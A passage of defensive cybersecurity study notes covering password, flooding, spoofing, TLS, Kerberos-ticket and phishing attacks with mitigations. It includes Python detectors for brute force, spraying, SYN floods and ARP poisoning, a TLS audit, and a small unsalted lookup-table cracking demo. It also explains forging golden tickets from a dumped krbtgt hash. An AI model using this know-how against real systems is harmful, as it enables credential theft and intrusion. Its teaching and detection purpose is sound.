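# --- the defence: per-user salt + slow KDF (PBKDF2 here; bcrypt/scrypt/Argon2 are equivalents) ---
def store_password(password: str, iterations: int = 100_000) -> str:
    """Record stored in the user database: algorithm, cost, salt and derived key."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time compare

def crack_salted(stored: str, table: Dict[str, str]) -> Optional[str]:
    """The precomputed table is useless here: the derived key depends on a salt that did
    not exist when the table was built, so the attacker must redo the slow KDF per guess,
    per user."""
    _, _, _, dk_hex = stored.split("$")
    return table.get(dk_hex)

if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted:", crack_unsalted(sha1_hex("Password@123"), table))
    print("salted:  ", crack_salted(store_password("Password@123"), table))
```

Two users with the same password get two different stored records, which is exactly the property rainbow tables rely on not having; the cost factor (iterations) then makes even an online guess loop slow.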

Mitigations
1) Implement strong or complex password policies
   a) uppercase
   b) lowercase
   c) special character
   d) number
   e) minimum length 12-16 characters
2) MFA (multi-factor authentication)
3) Account lockout policy
4) Previously used passwords should not be reused
5) Password rotation monthly or quarterly
6) Default passwords should not be used
7) Store passwords with a salted, slow hash (bcrypt, scrypt, Argon2, PBKDF2) so that rainbow tables do not apply
8) Against pass-the-hash: restrict NTLM where possible, enable Credential Guard, and never reuse the local admin password across machines (LAPS)
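Added example (not from these notes): telling the attacks in this category apart in the SOC from the failed-login events themselves. A brute-force or dictionary attack shows as one account failing many times from one source; a password spray shows as many different accounts failing once or twice each from one source, which an account-lockout rule never catches. The log lines are generated in the constructed format shown (a normalised "LOGIN_FAILED" event such as a SIEM parser would emit from Windows 4625 or SSH failures); the thresholds and time window are illustrative assumptions.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

LINE = re.compile(r"^(?P<ts>\S+ \S+) LOGIN_FAILED user=(?P<user>\S+) src=(?P<src>\S+)$")

def _mk(ts: datetime, user: str, src: str) -> str:
    return f"{ts:%Y-%m-%d %H:%M:%S} LOGIN_FAILED user={user} src={src}"

# Constructed log: 12 failures for alice from one host (brute force), 25 different users
# failing once each from one external host (spray), and one user mistyping twice (noise).
_base = datetime(2024, 3, 1, 9, 0, 0)
SAMPLE_LOG = "\n".join(
    [_mk(_base + timedelta(seconds=i), "alice", "10.0.0.5") for i in range(12)]
    + [_mk(_base + timedelta(minutes=10, seconds=i), f"user{i:02d}", "198.51.100.7") for i in range(25)]
    + [_mk(_base + timedelta(minutes=20), "dave", "10.0.0.9"), _mk(_base + timedelta(minutes=21), "dave", "10.0.0.9")]
)

def parse(log: str) -> Iterator[Tuple[datetime, str, str]]:
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["src"]

def detect(log: str, window: timedelta = timedelta(minutes=15),
           bf_threshold: int = 10, spray_users: int = 20) -> List[Dict]:
    """Sliding window over the events: brute force is keyed on (src, user) and counts
    failures; spray is keyed on src and counts *distinct* users. Each key alerts once."""
    events = sorted(parse(log))
    alerts: List[Dict] = []
    seen = set()
    for i, (ts, user, src) in enumerate(events):
        recent = [e for e in events[:i + 1] if e[0] >= ts - window]
        per_user = sum(1 for e in recent if e[1] == user and e[2] == src)
        users_from_src = {e[1] for e in recent if e[2] == src}
        if per_user >= bf_threshold and ("bf", src, user) not in seen:
            seen.add(("bf", src, user))
            alerts.append({"type": "brute_force", "src": src, "user": user, "count": per_user})
        if len(users_from_src) >= spray_users and ("spray", src) not in seen:
            seen.add(("spray", src))
            alerts.append({"type": "password_spray", "src": src, "users": len(users_from_src)})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

The spray rule is the one worth keeping in mind: per-account lockout (mitigation 3) sees only one failure per account here, so the source-based distinct-user count is what actually surfaces the attack.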

Flooding category (the attacker sends a huge number of requests to the targeted machine)

The attacker sends a very large number of requests to the targeted machine so that it becomes unavailable, damaged, crashed or interrupted; this is called a flooding attack. Examples:
1) TCP (SYN) flood attack
2) UDP flood attack
3) ICMP or ping flood attack
4) Ping of death
5) MAC flood attack
6) ARP flood attack
7) RARP flood attack
8) DoS
9) DDoS

Note: "flood" means an excessive volume of requests (a very large number of requests).

Note 1: as per the CIA triad, flooding attacks represent an availability issue for the organisation.

Mitigations
1) In parallel to the ISP router, deploy anti-DoS and anti-DDoS tools (or an upstream scrubbing service)
2) Define rate limiting or throttling in the perimeter and in the trusted / internal zone (FW, proxy, NIDS/NIPS, backend servers)
3) Implement NIDS/NIPS policies at the network level
4) In the backend server / trusted / internal zone implement iptables rules
5) Implement AV/EDR/DLP and encryption at rest and in transit (these protect confidentiality and integrity during the incident; they do not stop the flood itself)

25) TCP flood attack (SYN flood attack)
The attacker sends a flood of TCP SYN requests to the targeted machine, usually from spoofed source addresses, and never completes the three-way handshake. The server keeps a half-open connection for each SYN until its backlog is exhausted, so legitimate clients can no longer connect: business disruption / outage / an availability issue as per the CIA triad, and the attacker has compromised the availability of the targeted machine.

Mitigation
1) Implement rate limiting or throttling at the perimeter and also on the application side
2) Set the rate limit / threshold as per the business requirement and take appropriate action when it is exceeded
3) Check in parallel at the ISP router whether any malicious or abnormal activity is going on
4) In parallel to the ISP router deploy anti-DoS and anti-DDoS tools
5) Enable SYN cookies on the server so that half-open connections do not consume the backlog

26) UDP flood attack
The attacker sends a very large number of UDP packets to random ports on the targeted machine; the machine checks for a listening application on each port and replies with ICMP "destination unreachable", which exhausts its resources, and the targeted machine becomes unavailable, damaged or crashed.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool

27) MAC flood attack
The attacker sends a flood of Ethernet frames with random (dummy) source MAC addresses into the LAN. The switch's MAC address (CAM) table fills up, and the switch falls back to broadcasting every frame out of all ports like a hub; the attacker can then sniff traffic meant for other hosts, and the switch becomes unavailable, damaged or crashed. This is called a MAC flood attack.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool
4) Enable switch port security (limit the number of MAC addresses learned per port)
28) ARP flood attack
The attacker sends a flood of ARP requests or replies into the LAN, so that the targeted machine (or the switch) becomes unavailable, damaged or crashed.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool
4) Dynamic ARP inspection and ARP rate limiting on the switch

29) ICMP or ping flood attack
The attacker sends a very large number of ICMP echo (ping) requests to the targeted machine, so that the targeted machine becomes unavailable, damaged or crashed.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool

30) Ping of death
The attacker sends an oversized or malformed ICMP packet (reassembled size larger than the maximum IP packet size of 65535 bytes) to the targeted machine; an unpatched IP stack crashes while reassembling the fragments, so the machine becomes interrupted, damaged, crashed or unavailable.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool
4) Keep operating systems patched (modern IP stacks discard oversized reassembled packets) and drop fragmented or oversized ICMP at the firewall; a normal ping carries only 32 bytes (Windows) or 56 bytes (Linux) of payload, so anything near the 65535-byte limit is never legitimate

31) DoS attack
A single attacker sends a flood of requests to the targeted machine; because of the unauthorised attacker, authorised users lose the service. This is called a denial-of-service attack.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool

32) DDoS attack
Multiple attackers from multiple systems, or a single attacker controlling multiple systems (a botnet), target a single machine by flooding it with requests, so that it becomes unavailable, damaged or crashed. Because of the unauthorised attacker, legitimate or authorised users lose the service. This is called a distributed denial-of-service attack.

Mitigation
1) Implement anti-DoS and anti-DDoS tools in parallel to the ISP router
2) Implement rate limiting or throttling on the FW, WAF or backend server
3) Create a policy on / implement the NIDS/NIPS tool
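Added example (not from these notes): what the SYN flood from item 25 looks like in the data a firewall or flow collector sees, and what the "rate limit / throttling" mitigation actually does. The packet records are constructed: a legitimate client that completes its handshakes, plus a flood of SYN-only packets from twenty source addresses. The detector measures the half-open ratio per time window; the token bucket then limits new connections per source. Thresholds are illustrative assumptions.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# (time_s, src_ip, dst_port, flags) - constructed sample
def _synflood_sample() -> List[Tuple[float, str, int, str]]:
    pkts = []
    for i in range(40):                 # legitimate client: one SYN per 0.5 s, each followed by its ACK
        pkts.append((i * 0.5, "10.0.0.8", 443, "SYN"))
        pkts.append((i * 0.5 + 0.01, "10.0.0.8", 443, "ACK"))
    for i in range(500):                # flood from t=5 s: 100 SYN/s across 20 sources, never any ACK
        pkts.append((5 + i * 0.01, f"203.0.113.{i % 20}", 443, "SYN"))
    return sorted(pkts)

PACKETS = _synflood_sample()

def half_open_stats(packets, window: Tuple[float, float]) -> Dict[str, float]:
    """SYNs, handshake completions and half-open ratio inside [start, end). A healthy
    service completes almost every handshake; a SYN flood leaves almost all half-open."""
    syn = ack = 0
    for t, _, _, flags in packets:
        if window[0] <= t < window[1]:
            syn += flags == "SYN"
            ack += flags == "ACK"
    ratio = (syn - ack) / syn if syn else 0.0
    return {"syn": syn, "ack": ack, "half_open_ratio": round(ratio, 3)}

def is_syn_flood(packets, window: Tuple[float, float], syn_per_s: float = 50, half_open_ratio: float = 0.8) -> bool:
    s = half_open_stats(packets, window)
    rate = s["syn"] / (window[1] - window[0])
    return rate >= syn_per_s and s["half_open_ratio"] >= half_open_ratio

class TokenBucket:
    """Per-source limit: `rate` new connections per second with a burst of `capacity`."""
    def __init__(self, rate: float, capacity: int):
        self.rate, self.capacity = rate, capacity
        self.tokens: Dict[str, float] = defaultdict(lambda: float(capacity))
        self.last: Dict[str, float] = {}

    def allow(self, src: str, now: float) -> bool:
        elapsed = now - self.last.get(src, now)
        self.last[src] = now
        self.tokens[src] = min(self.capacity, self.tokens[src] + elapsed * self.rate)
        if self.tokens[src] >= 1:
            self.tokens[src] -= 1
            return True
        return False

def apply_limit(packets, rate: float = 2.0, capacity: int = 5) -> Dict[str, Counter]:
    """Run every SYN through the per-source bucket; count allowed/dropped per source."""
    bucket = TokenBucket(rate, capacity)
    verdict: Dict[str, Counter] = defaultdict(Counter)
    for t, src, _, flags in packets:
        if flags == "SYN":
            verdict[src]["allowed" if bucket.allow(src, t) else "dropped"] += 1
    return verdict

if __name__ == "__main__":
    print(half_open_stats(PACKETS, (0.0, 5.0)), is_syn_flood(PACKETS, (0.0, 5.0)))
    print(half_open_stats(PACKETS, (5.0, 10.0)), is_syn_flood(PACKETS, (5.0, 10.0)))
    print({k: dict(v) for k, v in apply_limit(PACKETS).items() if v["dropped"]})
```

The caveat the mitigations list glosses over: per-source rate limiting helps only while the flood comes from a bounded set of addresses. If each SYN carries a different spoofed source, every bucket stays full and nothing is dropped, which is why SYN cookies on the server and upstream scrubbing at the ISP are listed alongside it.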

Spoofing category (masquerading)

The attacker sends requests on behalf of an end user or genuine employee by impersonating or mimicking them, so that the attacker gains unauthorised access or sensitive data exposure.

Types of spoofing:
1) IP spoofing
2) Email spoofing
3) ARP spoofing or ARP poisoning attack
4) RARP spoofing attack (RARP is obsolete and rarely seen today)
5) DNS spoofing or DNS poisoning attack (and the related DNS amplification attack)

33) IP spoofing
The attacker sends packets whose source IP address field is forged to that of the end user (impersonating them) to the backend server; the backend server trusts the source address and responds as if to the legitimate host. In this way the attacker gains unauthorised access or sensitive data exposure, or uses the forged source to bounce flood traffic at a victim.

Masking of the IP: a Tor IP (The Onion Router) hides the attacker's real address.

Structure of an IPv4 packet: IP header (source IP, destination IP) + payload (the message).

Mitigation
1) Deep packet inspection
2) Stateful inspection
3) EDR/XDR
4) NGFW
5) Proxy
6) Ingress / egress filtering at the network edge (BCP 38), so packets with impossible source addresses are dropped

34) Email spoofing
The attacker sends an email whose From address is forged to look like it comes from an end user or a trusted sender (impersonation); the recipient responds or acts on it, and the attacker gains unauthorised access and sensitive data exposure.

Mitigation
1) Email security solution
2) Email gateway
3) Proxy
4) NGFW
5) Publish SPF, DKIM and DMARC records for our own domains, and reject inbound mail that fails them

35) ARP spoofing (Address Resolution Protocol) or ARP poisoning attack
On the LAN, hosts find each other's MAC addresses with ARP. The attacker sends forged ARP replies claiming that the gateway's (or another host's) IP address belongs to the attacker's MAC address; the end user's ARP cache is poisoned, so whenever the end user sends a request it goes to the attacker, who forwards it on to the real destination (man-in-the-middle). In this way the attacker reads or modifies the traffic and gains unauthorised access or sensitive data exposure.

Mitigation / remediation
1) NGFW
2) Proxy
3) NIDS/NIPS
4) Define rate limiting or throttling
5) Dynamic ARP inspection with DHCP snooping on the switches, or static ARP entries for critical hosts such as the gateway
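Added example (not from these notes): the check a NIDS signature or a host-side ARP monitor performs to spot the poisoning described above. Two things give it away: an IP address that suddenly resolves to a second MAC (especially the gateway, whose MAC is known), and one MAC that claims more than one IP. The ARP replies, addresses and the pinned gateway entry are all constructed for the example.

```python
from collections import defaultdict
from typing import Dict, List, Set

# (time, sender_ip, sender_mac, op) - only replies ("is-at") can poison a cache
ARP_SAMPLE = [
    (0, "10.0.0.1",  "aa:aa:aa:aa:aa:01", "is-at"),   # real gateway
    (1, "10.0.0.20", "aa:aa:aa:aa:aa:20", "is-at"),   # victim workstation
    (2, "10.0.0.1",  "de:ad:be:ef:00:99", "is-at"),   # attacker claims the gateway IP
    (3, "10.0.0.20", "de:ad:be:ef:00:99", "is-at"),   # attacker also claims the victim IP (full MITM)
    (4, "10.0.0.1",  "de:ad:be:ef:00:99", "is-at"),   # keeps re-poisoning with gratuitous replies
    (5, "10.0.0.1",  "aa:aa:aa:aa:aa:01", "is-at"),   # real gateway answers again: the mapping flaps
]
GATEWAY_IP = "10.0.0.1"
STATIC_TABLE = {GATEWAY_IP: "aa:aa:aa:aa:aa:01"}   # what a static ARP entry / DAI would pin

def detect_arp_spoof(replies, static: Dict[str, str] = STATIC_TABLE, gateway: str = GATEWAY_IP) -> List[str]:
    last_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    mitm_reported: Set[str] = set()
    alerts: List[str] = []
    for t, ip, mac, op in replies:
        if op != "is-at":
            continue
        if ip in static and static[ip] != mac:
            alerts.append(f"t={t}: {mac} claims pinned IP {ip} (expected {static[ip]})")
        if ip in last_mac and last_mac[ip] != mac:
            alerts.append(f"t={t}: {ip} changed {last_mac[ip]} -> {mac} (MAC flap)")
        last_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if (gateway in mac_to_ips[mac] and len(mac_to_ips[mac]) > 1
                and mac != static.get(gateway) and mac not in mitm_reported):
            mitm_reported.add(mac)
            others = sorted(mac_to_ips[mac] - {gateway})
            alerts.append(f"t={t}: {mac} claims the gateway and {others} (MITM)")
    return alerts

def suspicious_macs(replies) -> Set[str]:
    """MACs that claimed more than one IP; a normal host claims exactly one."""
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    for _, ip, mac, op in replies:
        if op == "is-at":
            mac_to_ips[mac].add(ip)
    return {m for m, ips in mac_to_ips.items() if len(ips) > 1}

if __name__ == "__main__":
    for line in detect_arp_spoof(ARP_SAMPLE):
        print(line)
```

The flap at t=5 is the signal that distinguishes poisoning from a legitimate NIC replacement: after a real hardware change the old MAC never answers again, whereas under attack the real host and the attacker keep overwriting each other's entry.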

36) DNS spoofing attack or DNS poisoning attack (and DNS amplification attack)

The attacker compromises the DNS server, or injects forged responses into a resolver's cache (cache poisoning), so that whenever the end user requests a legitimate domain the DNS answer points them to a defaced, fake or malicious website. When the end user clicks on or operates that website, the end user's machine is compromised as per the cyber kill chain, and the attacker gains unauthorised access or sensitive data exposure.
DNS amplification is a different attack that belongs to the flooding category: the attacker sends small DNS queries with the victim's spoofed source IP to open resolvers, which send much larger responses to the victim.

Mitigation
1) DNS security / DDI solution (with DNSSEC validation)
2) NGFW (DNS filtering)
3) Proxy (DNS filtering)
4) NIDS/NIPS implementation (DNS signatures)
5) Do not run open recursive resolvers reachable from the internet (prevents amplification)

Other category of attacks

34) Social engineering attack
Manipulating people, rather than technology, into revealing confidential or sensitive data or performing an action (a phone call pretending to be IT support, a fake bank message); the victim ends up sharing the data with the attacker. This is called a social engineering attack.
Examples of data targeted: debit card, credit card, passwords, any PII data

Mitigation
1) Security awareness

35) Shoulder surfing
Looking over another person's shoulder (at their screen or keyboard) and gaining unauthorised access or sensitive data exposure.

Mitigation
1) Security awareness (and privacy screens)

36) Eavesdropping
Secretly listening to other people's conversations (or, on the network, to their traffic) and gaining unauthorised access; this is called eavesdropping.

Mitigation
1) Security awareness (and encryption in transit for the network case)

37) Sweet32 attack or vulnerability
Sweet32 is a birthday attack on block ciphers with a 64-bit block size (3DES, Blowfish) used in SSL/TLS (and OpenVPN / SSH). After roughly 2^32 blocks (about 32 GB) of data on one long-lived connection, block collisions leak plaintext, which is enough to recover a session cookie. If our application's SSL/TLS configuration or server still offers such weak ciphers, the attacker negotiates them and eventually gains unauthorised access by compromising the session.
Examples of weak ciphers or algorithms that should be disabled:
1) RC4 (a stream cipher, broken; not a Sweet32 case, but banned as well)
2) 3DES (64-bit block)
3) Blowfish (64-bit block)
4) DES (56-bit key, 64-bit block)
5) RC5 in its 64-bit block configuration
(Twofish and MARS have 128-bit blocks and are not affected by Sweet32; the issue is the block size, not the key size.)

Mitigations
1) Implement strong cipher suites: AES-GCM or ChaCha20-Poly1305 for bulk encryption, ECDHE (or DHE) key exchange for forward secrecy, RSA or ECDSA signatures for authentication, and SHA-256 or better for hashing
2) Disable the 3DES / Blowfish cipher suites and limit the amount of data per TLS session (rekey)
(Note: RSA, DH, ECC and DSA are asymmetric algorithms used for key exchange and signatures; they do not replace the symmetric bulk cipher. Knapsack cryptosystems are broken and should not be used at all.)

38) Heartbleed
Heartbleed (CVE-2014-0160) is a bug in the OpenSSL library, not in the SSL/TLS protocol: the TLS heartbeat extension did not check the length field of the heartbeat request, so an attacker could ask the server (or client) to echo back up to 64 KB of its process memory per request. That memory can contain the server's private key, session cookies, user passwords and other sensitive data, which the attacker reads repeatedly and uses to gain unauthorised access or sensitive data exposure. If we are running an unpatched OpenSSL version (1.0.1 up to 1.0.1f), the attacker exploits it without leaving anything in the logs.

Mitigation
1) Upgrade OpenSSL to a patched version (1.0.1g or later) and restart every service that links it
2) Because the private key may already have leaked, revoke and reissue the SSL/TLS certificates with new keys, and reset user sessions and passwords
3) Use the latest TLS versions with strong cipher suites: TLS 1.2, TLS 1.3
4) Use strong cryptographic algorithms (RSA or ECDSA with ECDHE, AES-GCM, SHA-256)

39) POODLE (Padding Oracle On Downgraded Legacy Encryption)
POODLE exploits SSL 3.0: its CBC-mode cipher suites do not verify the padding bytes, so a man-in-the-middle who can make the client send many requests can decrypt one byte of the ciphertext (for example a session cookie) with about 256 attempts per byte. Even when both sides support TLS, the attacker first forces a protocol downgrade to SSL 3.0 by interfering with the handshake. In this way the attacker gains unauthorised access or sensitive data exposure.

Mitigation
1) Disable SSL 3.0 (and SSL 2.0, TLS 1.0, TLS 1.1) and use the latest TLS versions with strong cipher suites: TLS 1.2, TLS 1.3
2) Support TLS_FALLBACK_SCSV so that a downgrade attempt is detected and refused
3) Use strong cryptographic algorithms (ECDHE / DH for key exchange, RSA / ECDSA for signatures, AES-GCM for bulk encryption; do not use Knapsack-based schemes, which are broken)
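Added example (not from these notes): an audit of a server's offered protocol versions and cipher suites for the three weaknesses above (Sweet32: 64-bit block ciphers; POODLE: SSL 3.0 and CBC under it, no fallback SCSV; Heartbleed: a vulnerable OpenSSL build), followed by the hardened client-side policy built with Python's standard ssl module. The two scan results are constructed; real ones would come from a scanner such as testssl.sh or nmap's ssl-enum-ciphers script. The Heartbleed version list and the weak-cipher names are the real ones.

```python
import ssl
from typing import Dict, List

WEAK_BULK = {"3DES": "Sweet32 (64-bit block)", "DES": "Sweet32 (64-bit block)",
             "BLOWFISH": "Sweet32 (64-bit block)", "IDEA": "Sweet32 (64-bit block)",
             "RC4": "broken stream cipher (RFC 7465)", "NULL": "no encryption",
             "EXPORT": "export-grade key"}
LEGACY_PROTOCOLS = {"SSLv2": "obsolete", "SSLv3": "POODLE downgrade target",
                    "TLSv1.0": "deprecated", "TLSv1.1": "deprecated"}
HEARTBLEED_OPENSSL = ("1.0.1", "1.0.1a", "1.0.1b", "1.0.1c", "1.0.1d", "1.0.1e", "1.0.1f")

def audit_tls(scan: Dict) -> List[str]:
    """scan = {"protocols": [...], "ciphers": [...], "openssl": "x.y.z", "fallback_scsv": bool}"""
    protos = scan.get("protocols", [])
    findings = []
    for p in protos:
        if p in LEGACY_PROTOCOLS:
            findings.append(f"protocol {p}: {LEGACY_PROTOCOLS[p]}")
    for c in scan.get("ciphers", []):
        upper = c.upper().replace("-", "_")
        for bulk, why in WEAK_BULK.items():       # "3DES" is checked before "DES" on purpose
            if bulk in upper:
                findings.append(f"cipher {c}: {why}")
                break
        if "_CBC_" in upper and "SSLv3" in protos:
            findings.append(f"cipher {c}: CBC under SSLv3 -> POODLE")
    if "SSLv3" in protos and not scan.get("fallback_scsv", False):
        findings.append("no TLS_FALLBACK_SCSV: downgrade to SSLv3 cannot be detected")
    if scan.get("openssl") in HEARTBLEED_OPENSSL:
        findings.append(f"openssl {scan['openssl']}: Heartbleed (CVE-2014-0160) - upgrade, reissue keys")
    return findings

def hardened_client_context() -> ssl.SSLContext:
    """Client policy: TLS 1.2+ only, AEAD suites with forward secrecy, no 3DES/RC4."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!MD5:!3DES:!RC4")
    return ctx

def context_offers_weak_suite(ctx: ssl.SSLContext) -> bool:
    names = [c["name"].upper() for c in ctx.get_ciphers()]
    return any(b in n for n in names for b in ("3DES", "RC4", "DES-", "NULL"))

# Constructed scan results: a legacy server and a hardened one
LEGACY_SCAN = {
    "protocols": ["SSLv3", "TLSv1.0", "TLSv1.2"],
    "ciphers": ["TLS_RSA_WITH_3DES_EDE_CBC_SHA", "TLS_RSA_WITH_RC4_128_SHA",
                "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"],
    "openssl": "1.0.1f", "fallback_scsv": False,
}
HARDENED_SCAN = {
    "protocols": ["TLSv1.2", "TLSv1.3"],
    "ciphers": ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "TLS_CHACHA20_POLY1305_SHA256"],
    "openssl": "3.0.13", "fallback_scsv": True,
}

if __name__ == "__main__":
    for f in audit_tls(LEGACY_SCAN):
        print(f)
    print("hardened findings:", audit_tls(HARDENED_SCAN))
```

The same AES-CBC suite is flagged on the legacy server but would pass on the hardened one: CBC is only a POODLE problem when SSL 3.0 is still negotiable, which is why the first mitigation in each of the three items above is to remove the old protocol versions rather than only to add new ciphers.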

40) Data exfiltration
Leaking confidential or sensitive data out of the organisation (a data breach or data violation) is called data exfiltration.

Data that is typically exfiltrated:
- Personal data
- PII data
- PHI
- Organisation data, classified as
  1) Internal or private
  2) Restricted
  3) Public

Mitigation
1) DLP solutions (endpoint DLP, network DLP)
2) Security awareness

41) Privilege escalation
The attacker uses different TTPs to move from a lower level of access to a higher level; this is called privilege escalation.
Example: user account -> service account -> local admin / Administrator (Windows), or user -> sudo -> root (Unix)

Mitigation
1) RBAC (role-based access control)
2) Segregation of duties
3) Provide least-privilege access to end users, with privileged access managed through PAM

42) APT (Advanced Persistent Threat)

A = advanced (advanced TTPs)
P = persistent (continuously present and monitoring)
T = threat (exploitation of a weakness)

An APT is a well-resourced attacker (typically state-sponsored or organised crime) who uses advanced tactics, techniques and procedures, monitors the target continuously, and whenever a weakness is identified exploits the vulnerability; the attacker then stays in the environment quietly for a long time. In this way the attacker gains unauthorised access and sensitive data exposure.

Mitigations
1) ATP (advanced threat prevention) solutions
2) EDR
3) NGFW
4) Proxy or web gateway
5) Malware analysis tools
6) Threat hunting against the ATT&CK tactics listed above, since an APT is designed not to trigger signature-based alerts

43) Golden ticket attack
In Active Directory every Kerberos TGT (ticket granting ticket) is encrypted with the password hash of the krbtgt account on the domain controller. Once the attacker compromises the domain controller (or a domain admin) and dumps the krbtgt hash (for example with Mimikatz), they can forge a TGT for any user, with any group membership and any lifetime, and the domain accepts it. With this "golden ticket" the attacker gains unauthorised access to multiple systems across the organisation's AD, and the ticket stays valid until the krbtgt password is changed twice.

Mitigations
1) RBAC controls
2) Segregation of duties
3) Strong or complex password policies
4) AD must only be accessed via VPN / from privileged access workstations
5) Implement or configure CIS hardening benchmarks
6) Implement AV/DLP/encryption on the AD servers
7) All domain controller logs should be integrated into the SIEM tool
8) MFA should be implemented
9) Rotate the krbtgt password (twice) after any suspected domain compromise

44) Silver ticket attack
A silver ticket is a forged TGS (ticket granting service) ticket for one specific service. The attacker compromises the password hash of a service account (for example a computer account's hash for CIFS or HTTP) and, without contacting the domain controller at all, forges a service ticket on behalf of any end user and presents it directly to that service. In this way the attacker gains unauthorised access to that service or host; it is narrower than a golden ticket but harder to detect, because the domain controller never sees the request.

Mitigations
1) RBAC controls
2) Segregation of duties
3) Strong or complex password policies (long, random service account passwords; group managed service accounts)
4) AD must only be accessed via VPN / from privileged access workstations
5) Implement or configure CIS hardening benchmarks
6) Implement AV/DLP/encryption on the AD servers
7) All logs should be integrated into the SIEM tool
8) MFA should be implemented

45) Lateral movement
The attacker initially compromises one system and from there compromises other systems as well across the LAN or WAN, using stolen credentials, remote services (RDP, SMB / PsExec, WinRM) and the techniques above.

Mitigations
1) AV/EDR/XDR
2) Anti-malware tools
3) Malware analysis tools
4) Email security solutions or email gateways
5) NGFW
6) Proxy server
7) NIDS/NIPS
8) Network segmentation and unique local admin passwords, so one compromised host cannot reach or unlock the rest

47) Persistence
The attacker maintains a foothold in the compromised system so that they remain present in it even after the initial infection is cleaned or the machine is rebooted (for example through registry run keys, scheduled tasks, services or a backdoor account).

Mitigation
1) AV/EDR/XDR
2) Anti-malware
3) Malware analysis tools

48) Defence evasion
The attacker keeps their activity on the targeted machine hidden even though we are using defensive solutions (disabling or bypassing AV, obfuscating code, clearing logs, using LOLBins).

Mitigations
1) EDR/XDR
2) Anti-malware
3) Malware analysis tools

ATT&CK techniques covered so far: lateral movement, privilege escalation, data exfiltration, persistence, defence evasion.

Phishing email

The attacker sends a malicious email to the targeted end user and tricks them into clicking a link, opening an attachment or giving away credentials; following the cyber kill chain the attacker gains unauthorised access and sensitive data exposure.

How we identify phishing emails
1) Lottery / prize emails
2) Invoice copies as attachments
3) Order placed / order confirmation emails for orders we did not make
4) Job opportunity emails
5) Malicious URL links (the visible link text does not match the real link)
6) Malicious malware attachments
7) Grammatical mistakes, urgency, and a sender address or domain that does not match the claimed organisation
Phishing email types (typical target)
1) Spear phishing - corporate
2) Whaling - corporate
3) Vishing - personal
4) Smishing - personal
5) Malicious URL link - corporate
6) Malicious malware attachment - corporate
7) Quishing - corporate
8) Deepfake (AI-based impersonation) - personal
9) Snowshoeing - personal and corporate

49) Spear phishing attack
The attacker sends a targeted malicious email to a single end user or a small group of users, personalised with details about them or their organisation so that it looks legitimate, and compromises one or more of their systems. In this way the attacker gains unauthorised access.
Example: [email protected] or [email protected] or [email protected]

Mitigations
1) Email gateway / email security solutions, with the anti-spam policy, firewall policy and phishing policy configured
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns (simulations)

50) Whaling
The attacker sends the malicious email to executives, the board of directors or senior management (the "big fish") and tricks them; in this way the attacker gains unauthorised access or confidential data exposure.
Example targets: CEO, CFO, CTO, CIO, CISO, directors, vice presidents etc.

Mitigations
1) Email gateway / email security solutions
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns

51) Smishing
The attacker sends malicious content via text messages (SMS) or another messaging channel, for example a fake parcel-delivery or bank link; in this way the attacker obtains confidential data.

Mitigations
1) Email gateway / email security solutions (for the corporate mail side)
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR, and MDM on mobile devices
4) NGFW
5) Security awareness through phishing email campaigns

52) Vishing
The attacker makes a voice call, tricks the end user (for example by posing as the bank or IT support) into revealing confidential data or making a payment, and in this way uses it for monetary gain.

Mitigation
1) Security awareness through phishing email campaigns (including voice-call scenarios)

53) Malicious URL link
The attacker tricks the end user by sending a phishing email with a malicious URL link; when the end user clicks it, they are redirected to a malicious, fake or defaced website that imitates a legitimate login page. As soon as the end user enters their data into the form, the attacker captures it.

Mitigations
1) Email gateway / email security solutions
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway (URL filtering)
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns

54) Malicious malware attachment
